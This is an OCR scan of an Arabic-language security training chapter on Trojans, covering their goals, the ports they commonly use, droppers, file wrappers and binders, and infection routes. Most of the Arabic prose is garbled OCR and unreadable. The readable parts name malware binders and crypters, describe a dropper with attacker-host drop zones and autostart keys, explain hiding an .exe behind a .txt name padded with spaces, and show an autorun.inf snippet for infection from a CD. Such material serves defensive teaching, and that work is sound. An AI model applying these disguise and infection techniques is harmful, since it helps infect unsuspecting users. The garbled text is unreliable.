(6.1)



'Backdoor j S-^j^A 3 \ ^Ic (Jliaj L» jl (jl_^.jjii3l ^ a ofc^ a\ ^\ a^j^ ^il ^S^j (jl j& j3I ^ C5 juj r ijj3l 

•IjJa (j-aVl JJ^*-^ (j^ J-^*^ jn^ a lg_J ^ajflJ A-AaslSI Liajl 6^ jll £>i& l Qi^i'i .BackdOOr J 6^1 J^>ia 4 U ■n^l (j-<a ^Uaill jl A^JjuJI 

.Backdoorj foljjia <i^J 

6^1 J^a 4 U ^i^l ^1 jjl 
?6^lj^)Ia (jL^aa. £jL^a *Uc dla JJ (jl£ ^ 

6^1 J^a (jl > ^>^> ^ j^. j ^^-Sc dj|^)juj^<Jl 

o^lj^Ja > (jc l a.*<U 
D^lj^)Ja (jL^aa. (Jj3 (j-a ixi^JjaixJl QJjg niall ial_L<Jl 
S^l J^a (jl > ^->^> AjJa S^LjaxJl ^ijl^ill 
?6^lj^)Ia (jL-aa> (j^^a (jC ^ aiajVI L-jL (^5^ 
6^1 J^a (jl > ^Ludjj CjI j^I 
^Uaill ^Jl (J jj^a jl\ (jxi d^I j^)Ja (jL^aa. I^jS (j^ flJJ ^^jll <all^x» (j^lall 

6^lj^)Ia (jL^a^. 4 a 9l £ a ^lx*I^)J 

Backdoor j jjJa <i^a^J .ua (jljikVI ^uLc; 

6^1 J^a (jl > ^->^> ^jluj 4 jqj^ 



Ja>u]| £-uj ufl j-uj jit d^A ^ 



[Figure: module map. Trojan Concepts; Trojan Infection; Types of Trojans; Trojan Detection; Countermeasures; Anti-Trojan Software; Penetration Testing]
(6.2) Trojan Concepts



11a t a t >■> j <( jL^.jjj1] ajjujLujVI ^jaILJ! Vjl 1^ U jc^ t^Uaillj 4£jJo3I jjl j>» Jc LaA jjijbj (backdoor) jj^ ^-^j uW-jj-^ 

(j>» 4 a iklLoLxi]! DJ£juj JJ^VI isLLollj 4(jlj*.jjjll lljl ^ ^ (jlaljcl 4(jlj*.jjjll a) laJLujj (jxa (jlajxll <j^aLa £ tall JaLoiJj (jlj*.jjjll ^ajuikJl 



What is a Trojan?

(jjJ.j| Jj^all j t^jjj jAljJ e-ljj ^ n^J ^al jll LaJJJ (J^-J J(£ fcfl ^jjliaJl <J<L LgI j\ *^Uij ^jC-VI (jJJ jl *s ^Li j 

(jj^V CjIjj^j (j-G ^aC- jlL 6<J,JA (jL^^Jl ^ju ^j-ij^l jj^all ^^1^ 'UJ^* 1 6 C5^0^] J U1 W ^ J .^-^ lP 3 ^^ ^5^* > *a^J) 

jL^aJ! ^ijj ^jjj^ljjiall Jil^l .jjj£ JUl^l <1jAa3! J] <!Lk^U <A\a\\ jAk (jL^a^J! \ > ^ jjjipj (jjliA ttj^LuASj 

m llJx£ jUJaVlj frluijll ^>'J 4 lP->J^ (J^ J^J '^-^J ^ 4JjAa1I dl^ia tlgJ j^^J ^ ^LftJudU 

<3jjojj 6 jl^J> (jl jl 4_i^jJa3l ^liJl ^5 j3 L_fllstjJal ^^ic j^JJJ La Ullc. ^al^Jl ^axJJ ^j^Jj 44JIsl!I 4 jjt uJI dili ^<il jill 

(j^aj£3l <Lj ^jl ^j£-<uJl (j* j Jjja^ ^cxiljjj] (jlj*J! (_3^^ 6(il3i ^t_>.'>ijj ^jIj Ld^JC ^j^3 j tlLjaj j\ c ala <j| j^jj Lo C5 J t C 

£L-aA^ (jj^J (jl clA^ ^ > 10 ^ .S-^J^- (J udl JjuJI Cjl j (jLdJjVl AiUaJ ^al3jl jLoajlj ^^JjoiaIIj (j^aljkll t . iL^al) 

^^ic ^^JjouJI (jj^J l^JS ^^jll j 4_iik 4jilla j (jj^J ^5 ^c^lijjl! I^A (jl c^*^ ^ J '(^^ 4_jllc 4 JJT >*>1 dlli (jj^J ^) 4-C Jjjoui ^cxilijJ 
aIa^LujI p$ j£ <Lj (Jjrt^l ^1 Ajajx-G (jjJ (jjj^.VI 4 ^ a\ laJ > >i j£ ^Vlmj (jl Uiajl (j£-<uJl (j-d 4_l^jJall jl^J> 6 j^.l jJjUjjoj ^ ,l^J 

4£jJj Ijjj^j cJJj ^1 tills Jid <c jjj^d jjsJ! (denial- of -service) <*<^\ £y* (jUj^JI ^ c_j\£jjV <j^uJall jj jjj-*£ jW> 

.^Vll ^ j^l ^ DALnet IRC 

(^11 jj^ iLjjil! diVU^j'V! Jll^l (> Jl^ ^ ^1 Internet relay chat (IRC)^ ^ ^ DALnet) 

(jL^jjjll (jili jLiLdl till <Lj 4_i^jJall ^jl£ li] ,4_i^jJall 1 * ^ I^Lujj CjI jUldVI (j>» (_^ jloi^ll (jjoij cJ-^ ^^J^ 3 1 ^^/yj^ ? JJ*^^ 

jjslSI 4£jjuo3I J jj^ jll jSjj* ^11 jjII JiLd) (_^J^.I ^txil JJ CjJJJJj 46^ CAiLJ! cJ^ ,J *^ tdiUi jIslaII Jaj tdAiLJ! L_fli^. A j£ <l3 
tilli (j>» JJ^l (J JJ^a jll (_^ jJjaixi 6^Ujl 6JXJ (J^IsUjujI 4jjL^<i (j^J o^ljjla (jL^a^./(jL^.jjjJ! , jLlLdVl ^ij I— ^ llijjj <j ^"jj^axi 

CllIJJJ LaJjj Cj! jLiLdVl 6^1_1J Jc JaslSI 4 j£ <Lj o^ljjia (jU^^. (jli ;^-L^jll ^aJ lil /o^ljjia (jU^^. ^IXjolL ^ala (J?^\ ^.JjkjjoixJl A^LoJ C^ill 

^^U^jJalj jlgA Jc (^J^VI 4 JJJaJl j| j^VI (J^H 

jjjJI CjUK (jia ASi uo^ll ^Ujc^I JIjjI Jj^j Jll 3 rthiVl .a£jj^3I ^j^Vl 3 ^hiVl jjjj a£^\ ^ ^Uaj Jljlkl 

Jc ^Uajll (jl jlkl ^aJ li] .(jljlk^U (j^alA 4-jJajx-d 6jL^ J j\ {cleOT text) J 0**i J a£jjAa1I CjKj/MI jjc 

m A ui\ ul^Ji CjUi jlx-<Jl (j>» lA JJC. jl JJJ^ll CjIaKj (jJxJ^JjalxJl ^LgjojI (Jj^ i dJ Jc Ij^lfl Jj^.^11 (jj^J ^3 t^^Jjuall 
Ijjj ^a J^Jl (jj^l jAj^o£ ^Jsu ^aUaj JajJJ ^1J^J tlA^ijj jll CjUI J^-VI Jc ^SjJJ Jjia (jL^a^. ttilli J] 4iLjaVlj 

.cjUil jjlVl cJ-^^ ^j'y^l a1 laill ( . ujujjj JUIUj '(^spoofing)^)^^-} 

[Figure: an attacker's server sends commands to Trojan-infected victims in Chicago, London and Paris ("Send me credit card details", "Send me Facebook account information", "Send me e-banking login info") and each infected machine replies with the stolen data (credit card number and expiry date, Facebook login and profile, bank ATM and PIN code).]
Communication Paths: Overt and Covert Channels
diL* jLlaII jl cAiLiJ! JiJ jjIS sUS 6<^a ^uilxJI sUSIl jl l£j^j cs-**-* Covert ls* 6 cs-^* j Overt 

.dlLa j1x-<J!j CjUUJI Jil3 (J^joiJ (j-osuj 4^jjuo13 4_Lal 4jjj (j-<uia oUSl) o^A .A^jjuJI <£jjui (j-ajJa 

^a <jjjoJI CjI jj£3l .<£jjaJI CjUUJI (Jij a iklLujj ^^jll j ^^cjjai jj*-I1 jLlaaII 4<^a AjjjoJI SUal! t j^.VI ( ; ul^JI ( _ 5 lc ^)J^ 
^joij ^il! j i(Tunnet)(j^ ' A -^ ^^-^ ■ L - <-S^* Jj^j^ jj^ cs* ^AjLuM cs-^ <JL>^' 

<Jajuj| jj I&jc- t ftju^SI clA^ cillil tdiUi jIslxJI (J^Liil 4-jj^ <»— ^ ? i^iLujj V U» j^c . j^.1 <J j^ j^j^ ^^J^ r*-^ U' cJ j^ j-^jj^ 
Attractive mode j^ ^ ^ .'So^ sUSlI (jj£j (jl cAjLuII L — ^ j> ^jUr. c?' ^Uaill ^1 l_u3LujI ^l^kiujl 

m i v^'im^l jl^-aJI ^^ic Backdoor ^u/^ ^j^l sUSJI ^i^-all ^jl (j£-oj c_ 6*^1 jj^a q\ >^*^ <J^ 

jLoj ^ukJI sUill .cjUUJI Jfcl <a£jJJ! J jj j^ill ^Lk3 <>jja <c CjVU^j^U jL^ jA : (Overt channel) ^SUJI jjjjt 

l— itlnlajll j pocker.exe j& cj! jjSII JULg ^> > oji 

Jajuoji .(j-ftVI ^jojUjuj t all^j <Ljiaj 6a£jJo3I jl jj jji^ll ^Uaj J^b cijUi jlx-<JI JSjj sUSl! ^ ; (Covert channel) ^jj^t cjljjiil 

.Trojan.exe ^j^^ JH^>i 

Purpose of Trojans

.Jjt uSSlI ^Uij ^ ^IgJI cjULJI JI^jIojI jl cJi^ 
. {malicious file)^^ cjULJIj ^(adware) i(spyware)o»**$S jJjj lS^j 

.CjLuj Jj^l 4-a^l£^> ^cxil jjj AjjUII jlj^Jl (JjJaaU 

.^xj jo Jjj^ajll l-luo^ backdoor 
.cjU^JI jj] Proxy Server AjauJal l jl^ aJu^\ 
. DDoS^W^ ^(botnet) ^ jjjj ^ ^ujJI jj jjj-<£ ^I^l 
.^jjjilVl ^jjjII l5j^-j blastingj (spamming)$J^y j^j^ 



What Do Trojan Creators Look For

Jc. l1j^j13 ^a^klaaJ 6^1 Jjia 3 u ^i^l .l^jlc SjiaJjuJ! 3jojjUui j (_^J^VI 3 <JajVl diUi jIscaII A^jjoJ lfrJjtj£ ^aJJ ^Iajjj/S j| JjJa 4 

^jjA^.1^13 ^<uujj jl (j^j l^-jl ,(^j>.I^a3I) (jL^jjjll l_jjI£ ^1 djUi jlx-<JI d^a cJ^jj *^lcl ^jj tdj^j lili 6L_a^JI uJI djU» jls^ 

jIslxJI ^^ic <J jj^^JIj La (j^akjuj jl^J> (^^Jc (jauud^jll Uiajl ^ iklLujJ Jl (j^J r&j-aAxJ! JC-^U Ja^S a iklLujJ V S^ljjJa 4 L^Al 

4_JOll_JUd^il jl 4 t ^1 A. \ \ 

;4,JUi) ljU>uu^U dij j (Trojan) Sjl jj^ j ^ Luu) 

.^jjoull ^ cilli^j 6 (domain registration)^^^ J j^ > ^ l^l^iuit ji^j ^Ij tjUjjVI AiUaj djUjkxi 

^Jjjll JjjUc ^L-JJjll CjLqJI^ JJuJl Clil j t^gjjl^Jl (JIj^jVI JJUJ Cjl 4^ jJJ^lVl ^J^^ J^ ^ ^ ^-jLal^Jl ^^L^ 

.^C^y*l\ .JJjjll pLuljl ^jlc £ al\ ^cLaaJ ^jjl&lyi 
^ jjill i jj^L^II ^Vj^S li^ jj^j jl ^j^dj 4±^al\ Cjli JaxJI jjl jjI j presentations ^ ^ j^l <yj-^

.A^LVI ^1 jxJl ^Ijj) Jia 

^aJJ <C jJjuu* <iajauVl (jC Sj^S f^-^ (J^ J 6 ^_J <j^LkJl JJ Jjjd^t ^1.^1 ml ^ jl j-alaiVI 4 ^ dJ t fl^Jl 

^ ^ l \ 1 JJ j i i * J^ -v. I ^ In. 1 ^ iq | >^^J ^ u l 

,4_i^jL<JI jJ3 FTP ^-jIIaj L_fl^JI jj jj;^^ ~\ ikiLuji (j^j 
I^jj ^ilt j t^Uajlt ^ SjI jjL £ jjj ^ <jV ^UajSI ^ J jj^JI iaaa oj^jj ^ Script kiddie 's 

m ^l\ t^j^ > ^> cJ^*^ c ^ J 6 JJ^* cJ^-^ ^*^J J* > ^alt (j^ajall <Jc. ^jL c' % n^> ;4jIjsu l_a j > <aJJ 

lAA CjI Vil.nlt lit 



[Figure: what a Trojan creator looks for on a victim's machine]
- Credit card information
- Financial data (bank account numbers, social security numbers, insurance information, etc.)
- Using the victim's computer for illegal purposes such as to hack, scan, flood, or infiltrate other machines on the network or Internet
- Account data (email addresses, passwords, user names, etc.)
- Calendar information concerning the victim's whereabouts
- Confidential documents



Indications of a Trojan Attack
(jja^l j *W ^\-^&\ cJ.^ ' ^ Backdoor ^ (j^al^JI ^Uaill cjUUJI <ajjoJ ^ o ^ o (J^jj^/S^ljj^a (jU^^ 

lal II ^aJJ ^3 tit ^Uaill ^^^-Sc ^J^Uat ^1x^.1^31 > nj ^j£^Jj 4 6^lj^)Ia3 <jJa^)C ^Jj^aJ ^aUaill ^ <L^)IaJ tiL ^aLaJI ^Uailt 

ialixJlj ;4_Jjji3! (JjLuj^)3Ij tdj^^Iiltj Cjlfla^LJlj ^jjj^IVI -^)^ l!^ Ailla^ JjLujj a I laJkJ j ^aUailt J D^!j^)ia A L V .'S^ c ' 
|6^tj^)ia (JjS C-P 3 ^*^ ^•^ c ' ^ (J^alaJt ^aUailt ^^Ic iaa».^\j ^3 ^^jlt dit jjuj^Jt (J^axJ ^^Jj Uu3 ,ti!3i Ldj jliixJt 

m A^SLl ^ISlS c> ^^lijj £JflJ CD-ROM £ - 
^ d iLai q > ^ ^t JJ jJJ^^t ^jj^alo A-l^ jJ o^lct ^aJJ 
,L_fl^Jt jj jjj-o^lt c _ 5 ic ^jc. <juj^j^ CjIsuj>» JJ^ 3 
_4juUaJt ^j-d (JjLojj jt (_3^^J ^-C-^a 
. jLaaJtj (jjl^Jt ^jjjjUJt jtjjt L_fljUaj (JJJ^C ^aJJ 
.L_llk^a3t ^j-ajilt jt 6<£jjua3t (J j^-« 6^a^ j>Jt (Jj3 ^j-d ^Jt-nJa JJC. ulj 
_<J ^j>^>fl J^*3^ cJ Jl ^ ; ll uiaJt JJ J-Q Cjl JjliXJ ^aJJ 
^UujVt djliUaJ jjjt j3 j^JaJ ^JC- ^tjjai dltiLiJ 
.IP Q^kl ^ajL <J ^-aUJt JJjJf^lt J^J> jt cJ^St Jti j£oli ISP 
.L_fl^Jt (jC A y *M (JjUi jlstxJt (jC JJJ^t ^JjajSU ^JjjUlt 

■C**^ 1 ^ (J^J^ij lIaxJ V jt CjLujjjjilt AjLaaJt ^cxit jj (JjJasu ^aJJ 

.^al^xJt JaJjjuj g-lilkt 
i . i^lfl al l J ^jl ( ^ Qr- - Ic. LjuiI j t llflJ j J ^ U a^l l 4_juj\_juj
.^jalaJI dibl^cl jl 4j^L5J| 4jqU jJjiu 

.Windows 4*-^ jj 

4_JuaSJ fi t £3j ^j^d dlj^JJ ^jl ^JjJ^LaSI JjuIj^ 

_4_jaiaj ^litj JJ jJJ-a£3l (JjXjudJ d fltfljj 

-L UJI <> LjSju Ctrl+Alt+Del 

jJ-a JJC- cJ^^ lAlSl&/l^aja ^aJJ ^c^l jJl jl jj£l<Jl (Jlaxjll 
.Off jl Oil £^ ^juaij eliJj <Jj^JJ jj jjja^l 4_jujljai 



Common Ports Used by Trojans

^^Ic ^jli^j jj* jjaa£ jl^j> cJ^ .^j^W <JL^j*VI t^Ij£ aj t8>i j^ ; <JjLujj3Ij ^jjl&lVI ^j^t cJ^-^j J ffi ujIj <JLujj]j jj3I cIjIjj^j 

,4jiilaj <J£3 <Lflj (jUajjoaVlj <jLaij!>lI a^JjS 

"listening" j ^gfo* c_iVU> ^Ua AaJ iaUJI j 4^.V^ cjVL^jVI o^ai ^ 

j^.1 ^Uaj £x» (jU-aj| s-lj^-V jiajjJ (J?'^ ^J ^1 ^aUajll £-*JjoiJ LaAjc. <!L^Jl c-Ludj] 

.jaJj .jAIg (j-d jj£I ^^hin 6^1 jjia ^ u ^i^l O^*^ .^Uajll (Jjxjujj S^lcj ^jj LdAic. (JistCfl St(lt£) 

.cjUUjII JSjI ^ j^Vl iaU^I j (listening) 



Table: common ports used by Trojans (ports on which the Trojan server listens)

Port        Trojan
21          Blade Runner, Doly Trojan, Fore, Invisible FTP, WebEx, WinCrash
21          Tiny Telnet Server
25          Antigen, Email Password Sender, Terminator, WinPC, WinSpy
31          Hackers Paradise
80          Executor
421         TCP Wrappers trojan
456         Hackers Paradise
1001        Silencer, WebEx
1011        Doly Trojan
1170        Psyber Stream Server, Voice
1234        Ultors Trojan
1243        SubSeven 1.0-1.8
1492        FTP99CMP
1999        BackDoor 1.00-1.03
2001        Trojan Cow
2115        Bugs
2140        The Invasor
2155        Illusion Mailer, Nirvana
3150        The Invasor
4092        WinCrash
4567        File Nail 1
4590        ICQTrojan
5000        Bubbel
5001        Sockets de Troie
5400-02     Blade Runner
5569        Robo-Hack
6670-71     DeepThroat
6969        GateCrasher, Priority
7000        Remote Grab
7300-08     NetMonitor
7789        ICKiller
8787        BackOrifice 2000
9872-75     Portal of Doom
9989        iNi-Killer
10607       Coma 1.0.9
12345-46    GabanBus, NetBus
16969       Priority
20001       Millennium
20034       NetBus 2.0, Beta-NetBus 2.01
21544       GirlFriend 1.0, Beta-1.35
23222       Prosiak
23456       Evil FTP, Ugly FTP
26274       Delta
30100-02    NetSphere 1.27a
31337-38    Back Orifice, DeepBO
31339       NetSpy DK
40412       The Spy
40421-26    Masters Paradise
47262       Delta
50505       Sockets de Troie
50766       Fore
53001       Remote Windows Shutdown
54321       SchoolBus .69-1.11
61466       Telecommando
65000       Devil
[illegible] Death
[illegible] Senna Spy
[illegible] Shaft
[illegible] Shockrave
[illegible] Ripper
[illegible] BOWhack
[illegible] Prosiak
[illegible] BigGluck, TN
[illegible] Ini-Killer, Phase Zero, Stealth Spy
[illegible] Masters Paradise
[illegible] Satanz Backdoor
[illegible] Progenic trojan
[illegible] RAT
[illegible] Whack-a-mole
1807        [name illegible in the scan]
12223       [name illegible in the scan]
TROJAN INFECTION (6.3)



i"vWir.l a alia a l-uILojI ^jjjalij l_a jjoj t^jaakll ^ .Trojan Infection o^^j ( — s (jVl .(jLa-jjiill ^a&la^ t * li^U (^5!^ 

,<luaJI CA Ja ^j;^ £A ^ J laJ 4_jL^Ij 4_iajJall ^aUaj ^^ic D^lj^)ia ^jl - CllIJJj] ^a.1 g all <Jjfi 

How to Infect Systems Using a Trojan

d^I Jjb (j\ > C-UJJJ ^aJJ La,jjc. ,6^1 J^>ia (jl > (Jj^ia (jc Asu <jc ^Uaill ^^ic LllLiawa^iJl j S^_a.Vl g a\\ (j^-oJ 

L^^Jl $ ^ clA^ (jW <^>1 tilljA Ljajj (j^lj tdii Ij ^glll <jJajC CAiUJ! aJ (jl Ja^a cJxij V 4jI£ t^aUajll ^^ic 

;o (jjlaj ^ d^I jjja jU-aa. ^l^klojU ^Uail! j jjj > ^j (jjLaaA^-al! .third-party 

rL^ Cruii all 4CjliLll o ^J.Laa>JJ ^AaJL haII ^.J^M . (jAAaJll] j)\ 4_jj^)aj ClA la a^J ^3 6^l^^)Ja 4 j > I ^jAxu <aJ ^jj 

^li ^laljauil) lij La I^jS ^aJ£J V La <L^)iaJ ^al^-all <Jj3 (J-g 1 $la ^^)J ^aJJ l— .4 alia a\\ 4jl±Uj^\ CjL^IcVI ^j^AaJLauJl ^l^a. ^aJJ 

.LjUIj ^Uaill ^^Jc D^lj^la lIiijjj 4_iLaC I,jjj 4_liAa>j .j^a^ Cilia $V jl ^*J JjjS jaillj 

^Jc. 6^1 C-UJJJ ^aJJ tdjlia^ll ^J3 ^aJJ Ld^JC m( ^j JJJ^IVI ^^It CjUs^d <j!^La. J^ 3 (jL^a. jLaJjlj (JJ^^l & *W ^J^J 

;lA jjc-j jjj^IIj 4_ia.ljVl J^-^^ "Llajjoilj 6dAjLla3I djlaUaJ JIa CjliLJl ^ A alia o ^1 jjl ^^^ic jilll LLaJ laJLuiAli 

.C-Loj^aJ ^aUaill ^^ic 6^1 J^>ia (jL-aa. L-JJJJJ ^aJJ Cl 



_a^J( -aUaill AjjuaJ) lIjI jiiJoll cIjjjjjj ^ajij ^il( j ^jLa. jjj ja» ^ ^3^- j 'dropper ^Lijj ;2 SjJa^il 




[Figure: example of a dropper. Attacker -> malicious code -> dropper. Malicious code: installation path c:\windows\system32\svchosts.exe; autostart HKLM\Software\Mic...\Run\Explorer.exe; client address client.attacker.com; drop zone dropzone.attacker.com. A genuine application: file name chess.exe; wrapper data: executable file. Wrapper.]



j| j^i ^l^aiujlj wrapper ^Lijj :3 SjlaaJI 



.Aj^iall jjjjj^II JU^> ^ £i±Z&(wrapper) ^L^j ^3 Uj ^Elitewrap 'Graffiti.exe 'petite.exe 

a alia o JjLojj J^La. ^ ^jj ji j^j [spreading) jjjjj^II l>-jj^ jj^j .^IjjL jL^aa. ;4 SjJaaJI 
^ mj^^ (automatic execution mechanism) cP^I ii2II > 

Sjlcj ^J^wftJ _Ailla^3l ^ajLaJl 6j^a.VI J^U. ^ jj^Iia jVl Lol (floppy disc) 4i>all (j-aljSVI J^U. j^ 

, jj jjj^II jlgja. ^^Jc. Ljlflli jniTn (jjj jjjjall (jli t jj jjia£JI (Jjxjujj 

<^jLauij J^LjII l!jI£jjuj tdjjjjV! CjLuj^j^ t^jjj^lVl ^^1^ cJjLujj <J!)la. ^ djLujjjjill jjou ^ 

.hijacking J * network redirecting <P2P ^jULII 
■vfi»jj c>j uj^ ^^aJLu^ll .I^j ftjLjalt jA\ *Ui.y (jj-^l^xJI <JjS ^ Dropper ^v^hj .Dropper J^*-^ :5 Sjh^ll

^ yr^J J 3 ' c^J 1 ^ j^j^ 3 ^ ^-^jj^ . (damage routine)^jJ\ j>^l ^ :6 Sj^t 

fclcl ;CjULJ! ji* <jj*J\ payloads J^jll ji jj^JI o^j*i Payload .payload 

a( jjk\ jlj^l J c_wi3l jl < (reformatted) <>al jSVl 

[Figure: Trojan packet. The attacker wraps the Trojan with a genuine file (chess.exe) using a wrapper; on the victim's system the dropper drops the Trojan, followed by Trojan code execution.]
Source: http://www.obis.com

cJ^»->^ lie .^jn^^l dilqjjin^l jl l-jUJVI l!^ j$ ^*ll C3 T .-- ^exe c5jj^ ci^l jj^ c -^j^ ^Akiujj Wrappers 

^ajli ^aJ ((jl^ JJ^ <Ajli3l ClilJjllI <-iLa*J ^ikjjaixJl ^J*lj V <^l) 4_iiliJl ^k S^l jjia C-UJJJ V jl ^JJ <Ul£ 'Wrapped EXE ^aujmall 

^ji ^ j£ ^.l^xJI ^^^jjoiaII <jjou31j o^Ua ciiiful! ajIac ^1) ix»^L<JI (wrapped application) 4L«^*j ^ <^^l ^nJajll ^ixjulL 
c^j ciLJ .ki^! t*la I^jSai sbVt ^ .petite.exe ^1 ^ l^iuL (DOS/WIN) binary ^ j£l c> ofi > 

Cjl auS jlill (jC L_Lu£3l Jc 6J^IS JJC. CjLuj Jj^l * U*^ '^JC- c flju&ll ^aJJ VI 6^1 J^all (j£-<uJl (j-a ^ J .(J^^l 

(Jia t flj| U» j]| (jiasu ^C^J (jl (j£-<uJl (j-d Wrappers '^lj C5'^^ t cJ^-b <J ^qV^I djliUl (j^ ^jAslSI J-^aJ (jl a ^ ^.l^xJl 

.( . u^aII ^Ljoj ^^ic lIasu ^>^-VI L-fllxJl LaliJ AjalaJI ^.Ij L_aL» (Jjjuujj 

.Istxi (^^a^VI ^1 jJI cjU j£-<i -iajjJ ^Akiujj "glueware" ^W^j^^ j^-^ ^ ^jW^ W^rappers t^^ll a^UII ^ 



.c^ 1 ^^ unwrapped 



[Figure: Chess.exe (file size 90K) + Trojan.exe -> wrapped Chess.exe (file size 110K)]



(j-<i ^Li^^Li jii£l <Ljiaj ^Ia^Luj^U <Lla l^U^l ^.1 j djliLij j^a^> ^1 ^ii W^rapper 



Jjjjuj ^Jc. .Ajfll ^1 jl AjIjC-I (Jj^la (jC D^!j^)ia 



-Liinj ^ajlj (_^i3lj ^^UxJl lie 4_i^J jLaijU ^ajli ^.l^xJl c^^kl 4JLa. jk m jijjfi£l s j\ 

^Uu^Ludll 



Wrapper Covert Programs 



Kriptomatik 



jL, A*k\<^ jjj crackers ^ CjULJI j jjii^l < uj *> ^ ^ ^ill Wrapper Covert Kriptomatik 

.(Autorun)cP^I J^-^JI s ^ CD/DVD <jLw ^ ^ j^l ti^j^ c> 
- Configure icons
- Gather files
- Posts
- Propagation
.^Jl i j^iall j t attributes ^ISIsil J a^ I ls ^ 

[Figure: File Binder window with columns File Name, File Path, File Size, Inject To, Extract To; two files under C:\Documents and Settings\..., one of 379 KB; status: spread command unchecked; join count 0006.]

Advanced File Joiner



^Laaii! ^ D^Axid ^13^' cJj^^^j cLu& lij j c aL> djlaLJI c alia^> ^jja j ^^inn ^Ujj j& Advanced File Joiner 

ASCII 4_L^aill CjUIaII qii aj 6 JtLJl J^f^ ^^Sc .SbVI <U j^JudJ CjULJI i>i& ^jJa *J t^su^al CjUL djUL 

V StaVl . j^jjllj t(jliLftVI) £ jjIIj (jjoij j-a iaia I jjl£ lij L_aL ^ MPEG ^Ail* jrt^l cjUL jjj ^aJI jl 

J£l ^ .DOC cjliU j JPEG 'BMP 'AVI head information ^^j^^^H^lM VI^U 




[Figure: Advanced File Joiner file list (File Name, File Size) with two files under C:\Documents and Settings\..., and an output path field.]
SCB LAB's - Professional Malware Tool

1- Crypter: encrypts the payload using the following techniques:

Anti-Virtual Machine

XOR Encryption, CryptAPI, TEA, DES, Blowfish, Base64, RC4, Ghost, Huffman, Skipjack, TwoFish

2- Binder: binds files together.

3- Downloader: downloads files.

4- Spreader: spreads the files.



[Figure: SCB LAB's Professional Malware Tool window with tabs Index, Crypter, Binder, Downloader, Spreader; a file list with a Path column (C:\Documents and Settings\Admi...); buttons Add file, Execute, Build; status "The attached files weigh 714 KB".]
OneFileExeMaker



[Figure: Senna Spy One EXE Maker 2000 2.0a (official website: http://sennaspy.tsx.org). Caption: "Join many files and make a unique EXE file. This program allows join all kind of files: exe, dll, ocx, txt, jpg, bmp. Automatic OCX file register and Pack files support. Windows 9x, NT and 2000 compatible!" Columns: Short File Name, Parameters, Open/Execute, Action; options Open/Execute, Copy Only, Add File, Command Line Parameters, Hide.]
<j duli! (j^J 4jI P^J^ ls^J -j^^J f ^ a ^ 



Yet Another Binder (YAB)

http://yab.sourceforge.net

^lxAj^j _^I^L<iVI ^nijj jjjjuHllj ^cxi^ll ^lx»I^)J (JjJafll (j-«YAB 2^^^ 



https://www.facebook.com/tibea2004 



502 



e ^l!La ojjj^ ^ajjjoa l$\ j Pro Rat j^j^ j optix j^j^ ( ^*^ A + J^-^ cJ^f^ cs-^*- 3 ^ ^ -1 



[Figure: YAB "Add Bind File Command" dialog with fields Source File Path, Target Path (Absolute, "Force path to exist"), Creation Attributes (Read-only, Archive, Hidden, System), Execution Method (Execute asynchronously), Execution Parameters, "Try to delete file after execution", "Abort all processes if this process fails"; and the main window Yet Another Binder (YAB) V2.00 with menus File, Command, Options, Tools, Help, a Command Summary list, "Settings Saved: No", "Stub Built: No", root folder: temp.]



Ji* 4LL£S 4fc O^JJ^' diiliui ^ill ja$\ select command to add <> j^t 

AjauJa3 1 jl^a. jl tSljl^a. qa jt> jj^ll ^ l^L ^iil t^lli j Bind File 
4j^& j\ L_aLJ) cJi*J Delete file or folder 

U jll^j Jj^jjll ^ ^UaiSI CjI^L^ ^ Execute file 

jfolder, system folder 
Jji^ull ^jc Error -UL^j V Message Box 



Different Ways a Trojan Can Get Into a System



^Uaill ^jL^.j^i3l ^jli tialaill o^C*Lula .4_l^uJall ^aUaj L_U> gaj] D^lj^)Ia ^jL^a^. ^J^)Ja ^jC ^ iklLujJ ^ alia aII (J jj^a jll Ut a<

[Figure: ways a Trojan can get into a system]
- Instant Messenger applications
- IRC (Internet Relay Chat)
- Physical access
- Browser and email software bugs
- Fake programs
- Legitimate "shrink-wrapped" software packaged by a disgruntled employee
- Attachments
- Untrusted sites and freeware software
- NetBIOS (file sharing)
- Downloading files, games, and screensavers from Internet sites
Instant Messenger Applications

J ^ v^m^ l uj^ .Yahoo messenger J ICQ cjL^U^JI CjULnki <jc lA^ 
cjlijiiaj <^qAaH ^j^-vaU cialAnJaj ^ ^\ .jj>jj V aS\ l ' .(jjl (j* j\ J^jl o^*^ 6 messenger c^^A 3 ^^1^1 

C5^- ^100 I^SLLa uj^ U' 4-^3 V ^^aJLuixll . jU. jj^ll (Jjjia (jc- jAxJI j-* L^b c*JUa djja. ^messenger 
messenger ID tjj-^ ^ La sj ^ o^-^ ^j* <jl l_ ^ m ^ <Ja^J J jj j^xu jl^. ^j^ ^>^V1 < ; ul-^il 

IRC (Internet Relay Chat)

Trojan.txt J^l Ija <> *cs^ ^ ^ u' Trojan.exe jAil ^iki^ ^j^l ^ IRC 

j^k; ,DCC (Direct Client to Client) <As 'IRC <> ^ Jj^l ^ (With 150 spaces).exe 
L_flLi Jc- ^jii^j (.exe) o."^ uj^^^j ^ (JjjUII - ^» a m ^$j^xl\ < . l_a jjuj cAiLJI cIa JiLd ^jiii .(.TXT) cs - ^ 

l-aIaaI (Jj^j La LJlc. (jjjVn^l jj ^^Im^ .A-uL^g dijjjjj j' ^J^M ^lal j^ii Jll djliLJI (j-a ^1 lSj^'v ^ 

.4_ijU^Jl g*\ jA\j A^LVI ^IflVl J J' Jl c5 jiali ^jll jlaLLxJl ^ IjJ^J V ^-iV 6<JjU^3l 4_l^LVI 

Physical Access 
, jj* jjj^II (j-a^U <jjou11j 1^. jjj*j jj jjjx^H ^5^LJI jll ^jj5j 

d^I jjia ^jl - C-UJJJj <jLc. <L>Jj^a L_J j ml ^ ^-3jC- ^1 (JLujJJ ^3 ^^JjoixJI ^^Uaj ^^LJl J jj^ jll ^JjJ ^^JjoixJI 

J Ja yuJ^A (J-aj3 ^jJa j ^aJJ La,jjc .^^Ldll J jj^a jll lilLaJ LoAk- ^Uajll L-JJj ^il ^ j^.1 <3Jjia [AlltOStart] c _^jLallil ^Aj3I 

:CD ^ Jla Jc l^ja j ^jj ^lill Autorun.inf ^ J^ JULo .^I^V! ^j>! j ^ Ljlili I^jj <li ^CD-ROM 
[autorun] 
open=setup.exe 
icon=setup.exe 

■ ^ 2^^^^^ CljJJJJ (Jji_jujj ^jla A! j(g > nj o^ljjla (Jjstjujj (j^J 

.<u ^Lill ^j* jl U Ij^ij o^j 'M^ 5 ^ ^j^-^ 'CD function uj^ j*^ V o 1 ^^ c> 

